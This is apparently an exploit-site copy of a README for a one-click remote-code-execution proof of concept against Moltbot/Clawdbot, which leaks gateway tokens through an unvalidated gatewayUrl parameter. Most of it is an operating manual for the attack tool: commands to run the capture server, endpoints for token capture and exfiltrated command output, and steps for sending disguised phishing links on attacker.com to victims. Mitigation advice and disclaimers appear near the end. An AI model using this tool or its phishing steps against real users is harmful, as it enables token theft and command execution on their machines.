Share
## https://sploitus.com/exploit?id=6277D872-865C-578F-B46F-9266BCD65691
# π¦ Moltbot/Clawdbot 1-Click RCE PoC
A simplified, single-script proof-of-concept for the Moltbot/Clawdbot authentication token exfiltration vulnerability (GHSA-g8p2-7wf7-98mq).
> **β οΈ DISCLAIMER: This tool is for authorized security testing and educational purposes only. Only use against systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal.**
---
## Overview
This tool demonstrates a critical vulnerability in Moltbot (formerly Clawdbot) that allows an attacker to achieve remote code execution through a single click. The vulnerability exists because the Control UI trusts the `gatewayUrl` parameter from the query string without validation and auto-connects on page load, leaking the authentication token.
### Vulnerability Details
| Field | Value |
|-------|-------|
| Advisory ID | GHSA-g8p2-7wf7-98mq |
| CVSS Score | 8.8 (High) |
| Affected Versions |
cd moltbot-1click-rce
# Install dependencies
pip install flask flask-sock requests
# Or using requirements
pip install -r requirements.txt
```
### requirements.txt
```
flask>=2.0.0
flask-sock>=0.6.0
requests>=2.25.0
```
---
## Usage
### Interactive Mode
```bash
python moltbot_exploit.py
```
This launches an interactive menu with the following options:
```
βββββββββββββββββββββββββββββββββββββββββββ
β MAIN MENU β
βββββββββββββββββββββββββββββββββββββββββββ€
β 1. Start Exploit Server β
β 2. Configure Settings β
β 3. View Captured Tokens β
β 4. View Exfiltrated Data β
β 5. Generate Phishing Link β
β 6. Direct Gateway Connect (with token) β
β 7. Show Vulnerability Info β
β 0. Exit β
βββββββββββββββββββββββββββββββββββββββββββ
```
### Command Line Mode
```bash
# Start server directly with default settings
python moltbot_exploit.py --serve
# Start server on custom port
python moltbot_exploit.py --serve --port 9999
# Start server on custom host and port
python moltbot_exploit.py --serve --host 0.0.0.0 --port 8080
```
### Command Line Arguments
| Argument | Description | Default |
|----------|-------------|---------|
| `--serve` | Start server immediately without menu | False |
| `--port` | Server listening port | 8888 |
| `--host` | Server listening host | 0.0.0.0 |
---
## Configuration
Default settings can be modified through the interactive menu (Option 2) or by editing the `Config` class in the script:
```python
class Config:
HOST = "0.0.0.0" # Listen address
PORT = 8888 # Listen port
VICTIM_GATEWAY_HOST = "127.0.0.1" # Target gateway host
VICTIM_GATEWAY_PORT = 18789 # Target gateway port
VICTIM_CONTROL_UI = "http://localhost:5173" # Control UI URL
EXFIL_FILE = "exfiltrated_data.json" # Output file
```
---
## Endpoints
When the exploit server is running, the following endpoints are available:
| Endpoint | Description |
|----------|-------------|
| `GET /` | Stage 1 - Send this link to victim |
| `GET /stage2` | Stage 2 - Auto-opened, handles token capture and command execution |
| `WS /ws/capture` | WebSocket endpoint that captures leaked tokens |
| `GET /api/tokens` | API to retrieve captured tokens |
| `POST /api/exfil` | API to receive exfiltrated command output |
---
## Attack Scenario
### Step 1: Start the Exploit Server
```bash
python moltbot_exploit.py
# Select option 1 to start the server
```
### Step 2: Generate Phishing Link
```bash
# Select option 5 and enter your external IP/domain
# Example output: http://attacker.com:8888/
```
### Step 3: Send Link to Victim
Send the generated link to a victim who has an active Moltbot session. The link can be disguised:
```
http://attacker.com:8888/?ref=moltbot-security-update
http://attacker.com:8888/?article=important-notice
```
### Step 4: Token Capture
When the victim clicks the link:
1. Their browser opens Stage 2 in a new tab
2. They are redirected to their Control UI with the malicious `gatewayUrl`
3. The token is automatically sent to your WebSocket server
4. View captured tokens with menu option 3
### Step 5: Command Execution
Stage 2 automatically:
1. Retrieves the captured token from the server
2. Connects to the victim's gateway using the token
3. Provides a command input interface for RCE
---
## Output Files
### exfiltrated_data.json
Contains all exfiltrated data including command outputs:
```json
[
{
"type": "command_result",
"data": {
"result": "uid=1000(user) gid=1000(user) groups=1000(user)"
},
"timestamp": "2026-01-31T12:00:00.000000"
}
]
```
---
## Technical Details
### Token Exfiltration Mechanism
The vulnerability exists in the Control UI's handling of the `gatewayUrl` query parameter:
1. The Control UI reads `gatewayUrl` from `window.location.search`
2. No validation is performed on the URL
3. The UI automatically initiates a WebSocket connection to the provided URL
4. The stored authentication token is sent in the connection payload
5. An attacker-controlled server receives the token
### WebSocket Bridge Attack
Since WebSockets don't enforce same-origin policy:
1. The attacker's page (Stage 2) can connect to `ws://localhost:18789`
2. The victim's browser initiates the connection from their local context
3. This bypasses network-level restrictions on the gateway
4. The attacker effectively gains access to localhost services through the victim's browser
---
## Mitigation
### For Users
1. **Update immediately** to Moltbot v2026.1.29 or later
2. Do not click suspicious links while Moltbot is running
3. Use browser extensions that block cross-origin WebSocket connections
4. Consider running Moltbot in an isolated environment
### For Developers
1. Validate and sanitize all URL parameters, especially `gatewayUrl`
2. Require user confirmation before connecting to new gateway URLs
3. Implement WebSocket origin validation
4. Use secure token storage mechanisms
5. Add rate limiting on authentication attempts
---
## File Structure
```
moltbot-1click-rce/
βββ moltbot_exploit.py # Main exploit script
βββ README.md # This file
βββ requirements.txt # Python dependencies
βββ exfiltrated_data.json # Generated - contains captured data
```
---
## Troubleshooting
### No tokens being captured
- Ensure the victim has an active Moltbot Control UI session
- Verify your server is accessible from the victim's network
- Check that the WebSocket endpoint is reachable
### Cannot connect to victim's gateway
- The victim may have closed their browser
- The gateway token may have expired
- The gateway may be configured with additional authentication
### Stage 2 shows connection errors
- Verify the victim's gateway host/port configuration
- Check browser console for CORS or network errors
- Ensure the victim's Moltbot instance is running
---
## Legal Notice
This tool is provided for educational and authorized security testing purposes only. The authors are not responsible for any misuse or damage caused by this tool. Always obtain proper authorization before testing security vulnerabilities on any system.
Unauthorized access to computer systems is a criminal offense in most jurisdictions. By using this tool, you agree to use it only in accordance with applicable laws and regulations.
---
## Credits
- Original research by Ethiack (Henrique Branquinho, Bruno Mendes, AndrΓ© Baptista)
- Vulnerability discovered using Hackian autonomous security testing
- Advisory: GHSA-g8p2-7wf7-98mq
---
## Changelog
### v1.0.0
- Initial release
- Single-script implementation with interactive menu
- WebSocket token capture server
- Stage 1 and Stage 2 exploit pages
- Command execution interface
- Configuration management
- Token and data viewers
---
## License
MIT License - See LICENSE file for details.
**Remember: With great power comes great responsibility. Use this tool ethically.**